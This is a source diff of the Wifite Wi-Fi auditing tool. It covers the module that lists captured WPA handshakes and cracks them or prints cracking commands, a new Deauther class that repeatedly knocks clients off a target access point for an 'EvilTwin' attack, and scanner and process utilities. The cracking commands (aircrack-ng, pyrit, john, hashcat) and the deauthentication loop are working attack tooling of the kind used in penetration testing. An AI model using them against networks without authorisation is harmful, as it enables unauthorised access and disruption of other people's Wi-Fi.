#!/usr/bin/env python
|
#!/usr/bin/python2.7
|
||||||
# -*- coding: utf-8 -*-
|
# -*- coding: utf-8 -*-
|
||||||
|
|
||||||
from ..util.process import Process
|
from ..util.process import Process
|
||||||
from ..util.color import Color
|
from ..util.color import Color
|
||||||
from ..util.input import raw_input
|
from ..util.input import raw_input
|
||||||
from ..config import Configuration
|
from ..config import Configuration
|
||||||
|
from ..model.result import CrackResult
|
||||||
|
|
||||||
from datetime import datetime
|
from datetime import datetime
|
||||||
|
|
||||||
import os
|
import os
|
||||||
|
|
||||||
|
class CrackHandshake(object):
|
||||||
|
def __init__(self):
|
||||||
|
self.wordlist = Configuration.wordlist or "path_to_wordlist_here"
|
||||||
|
|
||||||
# TODO: Bring back the 'print' option, for easy copy/pasting. Just one-liners people can paste into terminal.
|
handshake = self.choose_handshake()
|
||||||
|
self.crack_handshake(handshake)
|
||||||
|
|
||||||
# TODO: Do not show handshake files that are in cracked.txt with a key (match on filename).
|
def crack_handshake(self, handshake):
|
||||||
|
cap_file = handshake["handshake_file"]
|
||||||
|
bssid = handshake["bssid"]
|
||||||
|
Color.pl("\n Below are commands to crack the handshake {C}%s{W}:" % cap_file)
|
||||||
|
self.print_aircrack(cap_file, bssid)
|
||||||
|
self.print_pyrit(cap_file, bssid)
|
||||||
|
self.print_john(cap_file)
|
||||||
|
self.print_oclhashcat(cap_file)
|
||||||
|
Color.pl("")
|
||||||
|
# TODO: cowpatty, oclhashcat
|
||||||
|
|
||||||
class CrackHelper:
|
def print_aircrack(self, cap_file, bssid):
|
||||||
'''Manages handshake retrieval, selection, and running the cracking commands.'''
|
Color.pl("")
|
||||||
|
if not Process.exists("aircrack-ng"):
|
||||||
TYPES = {
|
Color.pl(" {R}aircrack-ng not found.");
|
||||||
'4-WAY': 'WPA 4-Way Handshake',
|
Color.pl(" {O}More info on installing {R}Aircrack{O} here: {C}https://www.aircrack-ng.org/downloads.html{W}");
|
||||||
'PMKID': 'WPA PKID Hash'
|
|
||||||
}
|
|
||||||
|
|
||||||
|
|
||||||
@classmethod
|
|
||||||
def run(cls):
|
|
||||||
Configuration.initialize(False)
|
|
||||||
|
|
||||||
if not Configuration.wordlist:
|
|
||||||
Color.p('\n{+} Enter wordlist file to use for cracking: {G}')
|
|
||||||
Configuration.wordlist = raw_input()
|
|
||||||
if not os.path.exists(Configuration.wordlist):
|
|
||||||
Color.pl('{!} {R}Wordlist {O}%s{R} not found. Exiting.' % Configuration.wordlist)
|
|
||||||
return
|
return
|
||||||
Color.pl('')
|
Color.pl(" {O}# AIRCRACK: CPU-based cracking. Slow.")
|
||||||
|
Color.pl(" {G}aircrack-ng {W}-a {C}2 {W}-b {C}%s {W}-w {C}%s %s{W}" % (bssid, self.wordlist, cap_file))
|
||||||
|
|
||||||
handshakes = cls.get_handshakes()
|
def print_pyrit(self, cap_file, bssid):
|
||||||
if len(handshakes) == 0:
|
Color.pl("")
|
||||||
Color.pl('{!} {O}No handshakes found{W}')
|
if not Process.exists("pyrit"):
|
||||||
|
Color.pl(" {R}pyrit not found.");
|
||||||
|
Color.pl(" {O}More info on installing {R}Pyrit{O} here: {C}https://github.com/JPaulMora/Pyrit{W}");
|
||||||
return
|
return
|
||||||
hs_to_crack = cls.get_user_selection(handshakes)
|
Color.pl(" {O}# PYRIT: GPU-based cracking. Fast.")
|
||||||
|
Color.pl(" {G}pyrit {W}-b {C}%s {W}-i {C}%s {W}-r {C}%s {W}attack_passthrough{W}" % (bssid, self.wordlist, cap_file))
|
||||||
|
|
||||||
# TODO: Ask what method to use for WPA (aircrack, pyrit, john, hashcat, cowpatty)
|
def print_john(self, cap_file):
|
||||||
|
Color.pl("")
|
||||||
|
if not Process.exists("john"):
|
||||||
|
Color.pl(" {R}john not found.");
|
||||||
|
Color.pl(" {O}More info on installing {R}John The Ripper{O} here: {C}http://www.openwall.com/john/{W}");
|
||||||
|
return
|
||||||
|
Color.pl(" {O}# JOHN: CPU or GPU-based cracking. Fast.")
|
||||||
|
Color.pl(" {O}# Use --format=wpapsk-cuda (or wpapsk-opengl) to enable GPU acceleration")
|
||||||
|
Color.pl(" {O}# See http://openwall.info/wiki/john/WPA-PSK for more info on this process")
|
||||||
|
Color.pl(" {G}aircrack-ng {W}-J hccap {C}%s{W}" % cap_file)
|
||||||
|
Color.pl(" {G}hccap2john {C}hccap.hccap {W}> {C}hccap.john{W}")
|
||||||
|
Color.pl(" {G}john {W}--wordlist {C}\"%s\" {W}--format=wpapsk {C}\"hccap.john\"{W}" % (self.wordlist))
|
||||||
|
|
||||||
for hs in hs_to_crack:
|
def print_oclhashcat(self, cap_file):
|
||||||
cls.crack(hs)
|
Color.pl("")
|
||||||
|
if not Process.exists("hashcat"):
|
||||||
|
Color.pl(" {R}hashcat {O}not found.");
|
||||||
|
Color.pl(" {O}More info on installing {R}hashcat{O} here: {C}https://hashcat.net/hashcat/");
|
||||||
|
return
|
||||||
|
Color.pl(" {O}# HASHCAT: GPU-based cracking. Fast.")
|
||||||
|
Color.pl(" {O}# See {C}https://hashcat.net/wiki/doku.php?id=cracking_wpawpa2 {O}for more info")
|
||||||
|
|
||||||
@classmethod
|
hccapx_file = "/tmp/generated.hccapx"
|
||||||
def get_handshakes(cls):
|
cap2hccapx = "/usr/lib/hashcat-utils/cap2hccapx.bin"
|
||||||
handshakes = []
|
if os.path.exists(cap2hccapx):
|
||||||
|
Color.pl(" {G}%s {W}%s {C}%s{W}" % (cap2hccapx, cap_file, hccapx_file))
|
||||||
|
else:
|
||||||
|
Color.pl(" {O}# Install hashcat-utils: {C}https://hashcat.net/wiki/doku.php?id=hashcat_utils")
|
||||||
|
Color.pl(" {C}cap2hccapx.bin {W}%s {C}%s{W}" % (cap_file, hccapx_file))
|
||||||
|
Color.pl(" {O}# OR visit https://hashcat.net/cap2hccapx to generate a .hccapx file{W}")
|
||||||
|
Color.pl(" {O}# Then click BROWSE -> %s -> CONVERT and save to %s" % (cap_file, hccapx_file))
|
||||||
|
|
||||||
skipped_pmkid_files = 0
|
Color.pl(" {G}hashcat {W}-m 2500 {C}%s %s{W}" % (hccapx_file, self.wordlist))
|
||||||
|
|
||||||
|
def choose_handshake(self):
|
||||||
hs_dir = Configuration.wpa_handshake_dir
|
hs_dir = Configuration.wpa_handshake_dir
|
||||||
if not os.path.exists(hs_dir) or not os.path.isdir(hs_dir):
|
Color.pl("{+} Listing captured handshakes from {C}%s{W}\n" % os.path.realpath(hs_dir))
|
||||||
Color.pl('\n{!} {O}directory not found: {R}%s{W}' % hs_dir)
|
handshakes = []
|
||||||
return []
|
|
||||||
|
|
||||||
Color.pl('\n{+} Listing captured handshakes from {C}%s{W} ...\n' % os.path.abspath(hs_dir))
|
|
||||||
for hs_file in os.listdir(hs_dir):
|
for hs_file in os.listdir(hs_dir):
|
||||||
if hs_file.count('_') != 3:
|
if not hs_file.endswith('.cap') or hs_file.count("_") != 3:
|
||||||
continue
|
continue
|
||||||
|
|
||||||
if hs_file.endswith('.cap'):
|
name, essid, bssid, date = hs_file.split("_")
|
||||||
# WPA Handshake
|
|
||||||
hs_type = '4-WAY'
|
if name != 'handshake':
|
||||||
elif hs_file.endswith('.16800'):
|
|
||||||
# PMKID hash
|
|
||||||
if not Process.exists('hashcat'):
|
|
||||||
skipped_pmkid_files += 1
|
|
||||||
continue
|
|
||||||
hs_type = 'PMKID'
|
|
||||||
else:
|
|
||||||
continue
|
continue
|
||||||
|
|
||||||
name, essid, bssid, date = hs_file.split('_')
|
handshakes.append({
|
||||||
date = date.rsplit('.', 1)[0]
|
|
||||||
days,hours = date.split('T')
|
|
||||||
hours = hours.replace('-', ':')
|
|
||||||
date = '%s %s' % (days, hours)
|
|
||||||
|
|
||||||
handshake = {
|
|
||||||
'filename': os.path.join(hs_dir, hs_file),
|
|
||||||
'bssid': bssid.replace('-', ':'),
|
|
||||||
'essid': essid,
|
'essid': essid,
|
||||||
'date': date,
|
'bssid': bssid.replace('-', ':'),
|
||||||
'type': hs_type
|
'date': date.replace('.cap', '').replace('T', ' '),
|
||||||
}
|
'handshake_file': os.path.realpath(os.path.join(hs_dir, hs_file))
|
||||||
|
})
|
||||||
|
|
||||||
if hs_file.endswith('.cap'):
|
handshakes.sort(key=lambda x: x['date'], reverse=True)
|
||||||
# WPA Handshake
|
|
||||||
handshake['type'] = '4-WAY'
|
|
||||||
elif hs_file.endswith('.16800'):
|
|
||||||
# PMKID hash
|
|
||||||
handshake['type'] = 'PMKID'
|
|
||||||
else:
|
|
||||||
continue
|
|
||||||
|
|
||||||
handshakes.append(handshake)
|
if len(handshakes) == 0:
|
||||||
|
raise Exception("No handshakes found in %s" % os.path.realpath(hs_dir))
|
||||||
|
|
||||||
if skipped_pmkid_files > 0:
|
# Handshakes Header
|
||||||
Color.pl('{!} {O}Skipping %d {R}*.16800{O} files because {R}hashcat{O} is missing.' % skipped_pmkid_files)
|
max_essid_len = max(max([len(hs["essid"]) for hs in handshakes]), len('(truncated) ESSDID'))
|
||||||
|
Color.p(" NUM")
|
||||||
# Sort by Date (Descending)
|
Color.p(" " + "ESSID (truncated)".ljust(max_essid_len))
|
||||||
return sorted(handshakes, key=lambda x: x.get('date'), reverse=True)
|
Color.p(" " + "BSSID".ljust(17))
|
||||||
|
Color.p(" DATE CAPTURED\n")
|
||||||
|
Color.p(" ---")
|
||||||
@classmethod
|
Color.p(" " + ("-" * max_essid_len))
|
||||||
def print_handshakes(cls, handshakes):
|
Color.p(" " + ("-" * 17))
|
||||||
# Header
|
Color.p(" " + ("-" * 19) + "\n")
|
||||||
max_essid_len = max([len(hs['essid']) for hs in handshakes] + [len('ESSID (truncated)')])
|
# Print all handshakes
|
||||||
Color.p('{D} NUM')
|
for idx, hs in enumerate(handshakes, start=1):
|
||||||
Color.p(' ' + 'ESSID (truncated)'.ljust(max_essid_len))
|
bssid = hs["bssid"]
|
||||||
Color.p(' ' + 'BSSID'.ljust(17))
|
essid = hs["essid"]
|
||||||
Color.p(' ' + 'TYPE'.ljust(5))
|
date = hs["date"]
|
||||||
Color.p(' ' + 'DATE CAPTURED\n')
|
Color.p(" {G}%s{W}" % str(idx).rjust(3))
|
||||||
Color.p(' ---')
|
Color.p(" {C}%s{W}" % essid.ljust(max_essid_len))
|
||||||
Color.p(' ' + ('-' * max_essid_len))
|
Color.p(" {O}%s{W}" % bssid)
|
||||||
Color.p(' ' + ('-' * 17))
|
Color.p(" {W}%s{W}\n" % date)
|
||||||
Color.p(' ' + ('-' * 6))
|
# Get number from user
|
||||||
Color.p(' ' + ('-' * 19) + '{W}\n')
|
hs_index = raw_input(Color.s("\n{+} Select handshake num to crack ({G}1-%d{W}): " % len(handshakes)))
|
||||||
# Handshakes
|
if not hs_index.isdigit():
|
||||||
for index, handshake in enumerate(handshakes, start=1):
|
raise ValueError("Handshake NUM must be numeric, got (%s)" % hs_index)
|
||||||
bssid = handshake['bssid']
|
hs_index = int(hs_index)
|
||||||
date = handshake['date']
|
if hs_index < 1 or hs_index > len(handshakes):
|
||||||
Color.p(' {G}%s{W}' % str(index).rjust(3))
|
raise Exception("Handshake NUM must be between 1 and %d" % len(handshakes))
|
||||||
Color.p(' {C}%s{W}' % handshake['essid'].ljust(max_essid_len))
|
|
||||||
Color.p(' {O}%s{W}' % handshake['bssid'].ljust(17))
|
|
||||||
Color.p(' {C}%s{W}' % handshake['type'].ljust(5))
|
|
||||||
Color.p(' {W}%s{W}\n' % handshake['date'])
|
|
||||||
|
|
||||||
|
|
||||||
@classmethod
|
|
||||||
def get_user_selection(cls, handshakes):
|
|
||||||
cls.print_handshakes(handshakes)
|
|
||||||
|
|
||||||
Color.p('{+} Select handshake(s) to crack ({G}%d{W}-{G}%d{W}, select multiple with {C},{W} or {C}-{W}): {G}' % (1, len(handshakes)))
|
|
||||||
choices = raw_input()
|
|
||||||
|
|
||||||
selection = []
|
|
||||||
for choice in choices.split(','):
|
|
||||||
if '-' in choice:
|
|
||||||
first, last = [int(x) for x in choice.split('-')]
|
|
||||||
for index in range(first, last + 1):
|
|
||||||
selection.append(handshakes[index-1])
|
|
||||||
else:
|
|
||||||
index = int(choice)
|
|
||||||
selection.append(handshakes[index-1])
|
|
||||||
|
|
||||||
return selection
|
|
||||||
|
|
||||||
|
|
||||||
@classmethod
|
|
||||||
def crack(cls, hs):
|
|
||||||
Color.pl('\n{+} Cracking {C}%s{W} ({C}%s{W}) using {G}%s{W} method' % (hs['essid'], hs['bssid'], hs['type']))
|
|
||||||
if hs['type'] == 'PMKID':
|
|
||||||
crack_result = cls.crack_pmkid(hs)
|
|
||||||
elif hs['type'] == '4-WAY':
|
|
||||||
crack_result = cls.crack_4way(hs)
|
|
||||||
else:
|
|
||||||
raise ValueError('Cannot crack handshake: Type is not PMKID or 4-WAY. Handshake=%s' % hs)
|
|
||||||
|
|
||||||
if crack_result is None:
|
|
||||||
# Failed to crack
|
|
||||||
Color.pl('{!} {R}Failed to crack {O}%s{R} ({O}%s{R}): Passphrase not in dictionary' % (
|
|
||||||
hs['essid'], hs['bssid']))
|
|
||||||
else:
|
|
||||||
# Cracked, replace existing entry (if any), or add to
|
|
||||||
Color.pl('{+} {G}Cracked{W} {C}%s{W} ({C}%s{W}). Key: "{G}%s{W}"' % (
|
|
||||||
hs['essid'], hs['bssid'], crack_result.key))
|
|
||||||
crack_result.save()
|
|
||||||
|
|
||||||
|
|
||||||
@classmethod
|
|
||||||
def crack_4way(cls, hs):
|
|
||||||
from ..attack.wpa import AttackWPA
|
|
||||||
from ..model.handshake import Handshake
|
|
||||||
from ..model.wpa_result import CrackResultWPA
|
|
||||||
|
|
||||||
handshake = Handshake(hs['filename'],
|
|
||||||
bssid=hs['bssid'],
|
|
||||||
essid=hs['essid'])
|
|
||||||
|
|
||||||
key = None
|
|
||||||
try:
|
|
||||||
key = AttackWPA.crack_handshake(handshake, Configuration.wordlist, verbose=True)
|
|
||||||
except KeyboardInterrupt:
|
|
||||||
Color.pl('\n{!} Interrupted')
|
|
||||||
|
|
||||||
if key is not None:
|
|
||||||
return CrackResultWPA(hs['bssid'], hs['essid'], hs['filename'], key)
|
|
||||||
else:
|
|
||||||
return None
|
|
||||||
|
|
||||||
|
|
||||||
@classmethod
|
|
||||||
def crack_pmkid(cls, hs):
|
|
||||||
from ..tools.hashcat import Hashcat
|
|
||||||
from ..model.pmkid_result import CrackResultPMKID
|
|
||||||
|
|
||||||
key = None
|
|
||||||
try:
|
|
||||||
key = Hashcat.crack_pmkid(hs['filename'], verbose=True)
|
|
||||||
except KeyboardInterrupt:
|
|
||||||
Color.pl('\n{!} Interrupted')
|
|
||||||
|
|
||||||
if key is not None:
|
|
||||||
return CrackResultPMKID(hs['bssid'], hs['essid'], hs['filename'], key)
|
|
||||||
else:
|
|
||||||
return None
|
|
||||||
|
|
||||||
|
|
||||||
if __name__ == '__main__':
|
|
||||||
CrackHelper.run()
|
|
||||||
|
|
||||||
|
return handshakes[hs_index - 1]
|
||||||
|
|||||||
56
wifite/util/deauther.py
Normal file
56
wifite/util/deauther.py
Normal file
@@ -0,0 +1,56 @@
|
|||||||
|
#!/usr/bin/python2.7
|
||||||
|
# -*- coding: utf-8 -*-
|
||||||
|
|
||||||
|
import time
|
||||||
|
|
||||||
|
from ..tools.aireplay import Aireplay
|
||||||
|
from ..tools.ifconfig import Ifconfig
|
||||||
|
|
||||||
|
class Deauther(object):
|
||||||
|
'''
|
||||||
|
Deauthenticates clients associated with a target.
|
||||||
|
For use with EvilTwin.
|
||||||
|
'''
|
||||||
|
|
||||||
|
def __init__(self, interface, target):
|
||||||
|
self.interface = interface
|
||||||
|
self.interface_mac = Ifconfig.get_mac(interface)
|
||||||
|
self.target = target
|
||||||
|
self.running = False
|
||||||
|
self.clients = set()
|
||||||
|
|
||||||
|
|
||||||
|
def update_target(self, target):
|
||||||
|
# Refresh target (including list of clients)
|
||||||
|
self.target = target
|
||||||
|
|
||||||
|
|
||||||
|
def update_clients(self):
|
||||||
|
# Refreshes list of clients connected to target
|
||||||
|
for client in self.target.clients:
|
||||||
|
bssid = client.station
|
||||||
|
if bssid.lower() == self.interface_mac:
|
||||||
|
continue # Ignore this interface
|
||||||
|
elif bssid not in self.clients:
|
||||||
|
self.clients.add(bssid)
|
||||||
|
|
||||||
|
|
||||||
|
def start(self):
|
||||||
|
self.running = True
|
||||||
|
|
||||||
|
while self.running:
|
||||||
|
# Refresh list of clients
|
||||||
|
self.update_clients()
|
||||||
|
|
||||||
|
# Deauth clients
|
||||||
|
bssid = self.target.bssid
|
||||||
|
essid = self.target.essid if self.target.essid_known else None
|
||||||
|
for client_mac in clients:
|
||||||
|
Aireplay.deauth(bssid, essid=essid, client_mac=client_mac)
|
||||||
|
|
||||||
|
time.sleep(1)
|
||||||
|
|
||||||
|
|
||||||
|
def stop(self):
|
||||||
|
self.running = False
|
||||||
|
|
||||||
@@ -1,4 +1,4 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/python2.7
|
||||||
# -*- coding: utf-8 -*-
|
# -*- coding: utf-8 -*-
|
||||||
|
|
||||||
# Fix for raw_input on python3: https://stackoverflow.com/a/7321970
|
# Fix for raw_input on python3: https://stackoverflow.com/a/7321970
|
||||||
|
|||||||
@@ -1,4 +1,4 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/python2.7
|
||||||
# -*- coding: utf-8 -*-
|
# -*- coding: utf-8 -*-
|
||||||
|
|
||||||
import time
|
import time
|
||||||
@@ -29,11 +29,11 @@ class Process(object):
|
|||||||
if type(command) is not str or ' ' in command or shell:
|
if type(command) is not str or ' ' in command or shell:
|
||||||
shell = True
|
shell = True
|
||||||
if Configuration.verbose > 1:
|
if Configuration.verbose > 1:
|
||||||
Color.pe('\n {C}[?] {W} Executing (Shell): {B}%s{W}' % command)
|
Color.pe("\n {C}[?] {W} Executing (Shell): {B}%s{W}" % command)
|
||||||
else:
|
else:
|
||||||
shell = False
|
shell = False
|
||||||
if Configuration.verbose > 1:
|
if Configuration.verbose > 1:
|
||||||
Color.pe('\n {C}[?]{W} Executing: {B}%s{W}' % command)
|
Color.pe("\n {C}[?]{W} Executing: {B}%s{W}" % command)
|
||||||
|
|
||||||
pid = Popen(command, cwd=cwd, stdout=PIPE, stderr=PIPE, shell=shell)
|
pid = Popen(command, cwd=cwd, stdout=PIPE, stderr=PIPE, shell=shell)
|
||||||
pid.wait()
|
pid.wait()
|
||||||
@@ -45,9 +45,9 @@ class Process(object):
|
|||||||
|
|
||||||
|
|
||||||
if Configuration.verbose > 1 and stdout is not None and stdout.strip() != '':
|
if Configuration.verbose > 1 and stdout is not None and stdout.strip() != '':
|
||||||
Color.pe('{P} [stdout] %s{W}' % '\n [stdout] '.join(stdout.strip().split('\n')))
|
Color.pe("{P} [stdout] %s{W}" % '\n [stdout] '.join(stdout.strip().split('\n')))
|
||||||
if Configuration.verbose > 1 and stderr is not None and stderr.strip() != '':
|
if Configuration.verbose > 1 and stderr is not None and stderr.strip() != '':
|
||||||
Color.pe('{P} [stderr] %s{W}' % '\n [stderr] '.join(stderr.strip().split('\n')))
|
Color.pe("{P} [stderr] %s{W}" % '\n [stderr] '.join(stderr.strip().split('\n')))
|
||||||
|
|
||||||
return (stdout, stderr)
|
return (stdout, stderr)
|
||||||
|
|
||||||
@@ -73,7 +73,7 @@ class Process(object):
|
|||||||
self.command = command
|
self.command = command
|
||||||
|
|
||||||
if Configuration.verbose > 1:
|
if Configuration.verbose > 1:
|
||||||
Color.pe('\n {C}[?] {W} Executing: {B}%s{W}' % ' '.join(command))
|
Color.pe("\n {C}[?] {W} Executing: {B}%s{W}" % ' '.join(command))
|
||||||
|
|
||||||
self.out = None
|
self.out = None
|
||||||
self.err = None
|
self.err = None
|
||||||
@@ -93,24 +93,21 @@ class Process(object):
|
|||||||
Ran when object is GC'd.
|
Ran when object is GC'd.
|
||||||
If process is still running at this point, it should die.
|
If process is still running at this point, it should die.
|
||||||
'''
|
'''
|
||||||
try:
|
|
||||||
if self.pid and self.pid.poll() is None:
|
if self.pid and self.pid.poll() is None:
|
||||||
self.interrupt()
|
self.interrupt()
|
||||||
except AttributeError:
|
|
||||||
pass
|
|
||||||
|
|
||||||
def stdout(self):
|
def stdout(self):
|
||||||
''' Waits for process to finish, returns stdout output '''
|
''' Waits for process to finish, returns stdout output '''
|
||||||
self.get_output()
|
self.get_output()
|
||||||
if Configuration.verbose > 1 and self.out is not None and self.out.strip() != '':
|
if Configuration.verbose > 1 and self.out is not None and self.out.strip() != '':
|
||||||
Color.pe('{P} [stdout] %s{W}' % '\n [stdout] '.join(self.out.strip().split('\n')))
|
Color.pe("{P} [stdout] %s{W}" % '\n [stdout] '.join(self.out.strip().split('\n')))
|
||||||
return self.out
|
return self.out
|
||||||
|
|
||||||
def stderr(self):
|
def stderr(self):
|
||||||
''' Waits for process to finish, returns stderr output '''
|
''' Waits for process to finish, returns stderr output '''
|
||||||
self.get_output()
|
self.get_output()
|
||||||
if Configuration.verbose > 1 and self.err is not None and self.err.strip() != '':
|
if Configuration.verbose > 1 and self.err is not None and self.err.strip() != '':
|
||||||
Color.pe('{P} [stderr] %s{W}' % '\n [stderr] '.join(self.err.strip().split('\n')))
|
Color.pe("{P} [stderr] %s{W}" % '\n [stderr] '.join(self.err.strip().split('\n')))
|
||||||
return self.err
|
return self.err
|
||||||
|
|
||||||
def stdoutln(self):
|
def stdoutln(self):
|
||||||
@@ -135,7 +132,7 @@ class Process(object):
|
|||||||
return (self.out, self.err)
|
return (self.out, self.err)
|
||||||
|
|
||||||
def poll(self):
|
def poll(self):
|
||||||
''' Returns exit code if process is dead, otherwise 'None' '''
|
''' Returns exit code if process is dead, otherwise "None" '''
|
||||||
return self.pid.poll()
|
return self.pid.poll()
|
||||||
|
|
||||||
def wait(self):
|
def wait(self):
|
||||||
@@ -180,30 +177,23 @@ class Process(object):
|
|||||||
|
|
||||||
|
|
||||||
if __name__ == '__main__':
|
if __name__ == '__main__':
|
||||||
Configuration.initialize(False)
|
|
||||||
p = Process('ls')
|
p = Process('ls')
|
||||||
print(p.stdout())
|
print(p.stdout(), p.stderr())
|
||||||
print(p.stderr())
|
|
||||||
p.interrupt()
|
p.interrupt()
|
||||||
|
|
||||||
# Calling as list of arguments
|
# Calling as list of arguments
|
||||||
(out, err) = Process.call(['ls', '-lah'])
|
(out, err) = Process.call(['ls', '-lah'])
|
||||||
print(out)
|
print(out, err)
|
||||||
print(err)
|
|
||||||
|
|
||||||
print('\n---------------------\n')
|
print('\n---------------------\n')
|
||||||
|
|
||||||
# Calling as string
|
# Calling as string
|
||||||
(out, err) = Process.call('ls -l | head -2')
|
(out, err) = Process.call('ls -l | head -2')
|
||||||
print(out)
|
print(out, err)
|
||||||
print(err)
|
|
||||||
|
|
||||||
print('"reaver" exists: %s' % Process.exists('reaver'))
|
print('"reaver" exists:', Process.exists('reaver'))
|
||||||
|
|
||||||
# Test on never-ending process
|
# Test on never-ending process
|
||||||
p = Process('yes')
|
p = Process('yes')
|
||||||
print('Running yes...')
|
|
||||||
time.sleep(1)
|
|
||||||
print('yes should stop now')
|
|
||||||
# After program loses reference to instance in 'p', process dies.
|
# After program loses reference to instance in 'p', process dies.
|
||||||
|
|
||||||
|
|||||||
@@ -1,8 +1,8 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/python2.7
|
||||||
# -*- coding: utf-8 -*-
|
# -*- coding: utf-8 -*-
|
||||||
|
|
||||||
from ..util.color import Color
|
|
||||||
from ..tools.airodump import Airodump
|
from ..tools.airodump import Airodump
|
||||||
|
from ..util.color import Color
|
||||||
from ..util.input import raw_input, xrange
|
from ..util.input import raw_input, xrange
|
||||||
from ..model.target import Target
|
from ..model.target import Target
|
||||||
from ..config import Configuration
|
from ..config import Configuration
|
||||||
@@ -17,18 +17,16 @@ class Scanner(object):
|
|||||||
|
|
||||||
def __init__(self):
|
def __init__(self):
|
||||||
'''
|
'''
|
||||||
Scans for targets via Airodump.
|
Starts scan, prints as it goes.
|
||||||
Loops until scan is interrupted via user or config.
|
Upon interrupt, sets 'targets'.
|
||||||
Note: Sets this object's `targets` attrbute (list[Target]) upon interruption.
|
|
||||||
'''
|
'''
|
||||||
self.previous_target_count = 0
|
self.previous_target_count = 0
|
||||||
self.targets = []
|
self.targets = []
|
||||||
self.target = None # Target specified by user (based on ESSID/BSSID)
|
self.target = None # Specific target (based on ESSID/BSSID)
|
||||||
|
|
||||||
max_scan_time = Configuration.scan_time
|
|
||||||
|
|
||||||
self.err_msg = None
|
self.err_msg = None
|
||||||
|
|
||||||
|
Color.pl("")
|
||||||
# Loads airodump with interface/channel/etc from Configuration
|
# Loads airodump with interface/channel/etc from Configuration
|
||||||
try:
|
try:
|
||||||
with Airodump() as airodump:
|
with Airodump() as airodump:
|
||||||
@@ -37,15 +35,18 @@ class Scanner(object):
|
|||||||
|
|
||||||
while True:
|
while True:
|
||||||
if airodump.pid.poll() is not None:
|
if airodump.pid.poll() is not None:
|
||||||
return # Airodump process died
|
# Airodump process died
|
||||||
|
self.err_msg = '\r{!} {R}Airodump exited unexpectedly (Code: %d){O} Command: {W}%s' % (airodump.pid.poll(), " ".join(airodump.pid.command))
|
||||||
|
raise KeyboardInterrupt
|
||||||
|
|
||||||
self.targets = airodump.get_targets(old_targets=self.targets)
|
try:
|
||||||
|
self.targets = airodump.get_targets()
|
||||||
|
except Exception as e:
|
||||||
|
break
|
||||||
|
|
||||||
if self.found_target():
|
if self.found_target():
|
||||||
return # We found the target we want
|
# We found the target we want
|
||||||
|
return
|
||||||
if airodump.pid.poll() is not None:
|
|
||||||
return # Airodump process died
|
|
||||||
|
|
||||||
for target in self.targets:
|
for target in self.targets:
|
||||||
if target.bssid in airodump.decloaked_bssids:
|
if target.bssid in airodump.decloaked_bssids:
|
||||||
@@ -54,38 +55,37 @@ class Scanner(object):
|
|||||||
self.print_targets()
|
self.print_targets()
|
||||||
|
|
||||||
target_count = len(self.targets)
|
target_count = len(self.targets)
|
||||||
client_count = sum([len(t.clients) for t in self.targets])
|
client_count = sum(
|
||||||
|
[len(t.clients)
|
||||||
outline = '\r{+} Scanning'
|
for t in self.targets])
|
||||||
|
outline = "\r{+} Scanning"
|
||||||
if airodump.decloaking:
|
if airodump.decloaking:
|
||||||
outline += ' & decloaking'
|
outline += " & decloaking"
|
||||||
outline += '. Found'
|
outline += ". Found"
|
||||||
outline += ' {G}%d{W} target(s),' % target_count
|
outline += " {G}%d{W} target(s)," % target_count
|
||||||
outline += ' {G}%d{W} client(s).' % client_count
|
outline += " {G}%d{W} client(s)." % client_count
|
||||||
outline += ' {O}Ctrl+C{W} when ready '
|
outline += " {O}Ctrl+C{W} when ready "
|
||||||
Color.clear_entire_line()
|
Color.clear_entire_line()
|
||||||
Color.p(outline)
|
Color.p(outline)
|
||||||
|
|
||||||
if max_scan_time > 0 and time() > scan_start_time + max_scan_time:
|
if Configuration.scan_time > 0 and time() > scan_start_time + Configuration.scan_time:
|
||||||
return
|
return
|
||||||
|
|
||||||
sleep(1)
|
sleep(1)
|
||||||
|
|
||||||
except KeyboardInterrupt:
|
except KeyboardInterrupt:
|
||||||
pass
|
pass
|
||||||
|
|
||||||
|
|
||||||
def found_target(self):
|
def found_target(self):
|
||||||
'''
|
'''
|
||||||
Detect if we found a target specified by the user (optional).
|
Check if we discovered the target AP
|
||||||
Sets this object's `target` attribute if found.
|
Returns: the Target if found,
|
||||||
Returns: True if target was specified and found, False otherwise.
|
Otherwise None.
|
||||||
'''
|
'''
|
||||||
bssid = Configuration.target_bssid
|
bssid = Configuration.target_bssid
|
||||||
essid = Configuration.target_essid
|
essid = Configuration.target_essid
|
||||||
|
|
||||||
if bssid is None and essid is None:
|
if bssid is None and essid is None:
|
||||||
return False # No specific target from user.
|
return False
|
||||||
|
|
||||||
for target in self.targets:
|
for target in self.targets:
|
||||||
if Configuration.wps_only and target.wps != True:
|
if Configuration.wps_only and target.wps != True:
|
||||||
@@ -104,15 +104,16 @@ class Scanner(object):
|
|||||||
|
|
||||||
return False
|
return False
|
||||||
|
|
||||||
|
|
||||||
def print_targets(self):
|
def print_targets(self):
|
||||||
'''Prints targets selection menu (1 target per row).'''
|
'''
|
||||||
|
Prints targets to console
|
||||||
|
'''
|
||||||
if len(self.targets) == 0:
|
if len(self.targets) == 0:
|
||||||
Color.p('\r')
|
Color.p('\r')
|
||||||
return
|
return
|
||||||
|
|
||||||
if self.previous_target_count > 0:
|
if self.previous_target_count > 0:
|
||||||
# We need to 'overwrite' the previous list of targets.
|
# We need to "overwrite" the previous list of targets.
|
||||||
if Configuration.verbose <= 1:
|
if Configuration.verbose <= 1:
|
||||||
# Don't clear screen buffer in verbose mode.
|
# Don't clear screen buffer in verbose mode.
|
||||||
if self.previous_target_count > len(self.targets) or \
|
if self.previous_target_count > len(self.targets) or \
|
||||||
@@ -125,7 +126,7 @@ class Scanner(object):
|
|||||||
Process.call('clear')
|
Process.call('clear')
|
||||||
else:
|
else:
|
||||||
# We can fit the targets in the terminal without scrolling
|
# We can fit the targets in the terminal without scrolling
|
||||||
# 'Move' cursor up so we will print over the previous list
|
# "Move" cursor up so we will print over the previous list
|
||||||
Color.pl(Scanner.UP_CHAR * (3 + self.previous_target_count))
|
Color.pl(Scanner.UP_CHAR * (3 + self.previous_target_count))
|
||||||
|
|
||||||
self.previous_target_count = len(self.targets)
|
self.previous_target_count = len(self.targets)
|
||||||
@@ -166,15 +167,7 @@ class Scanner(object):
|
|||||||
return int(columns)
|
return int(columns)
|
||||||
|
|
||||||
def select_targets(self):
|
def select_targets(self):
|
||||||
'''
|
''' Asks user to select target(s) '''
|
||||||
Returns list(target)
|
|
||||||
Either a specific target if user specified -bssid or --essid.
|
|
||||||
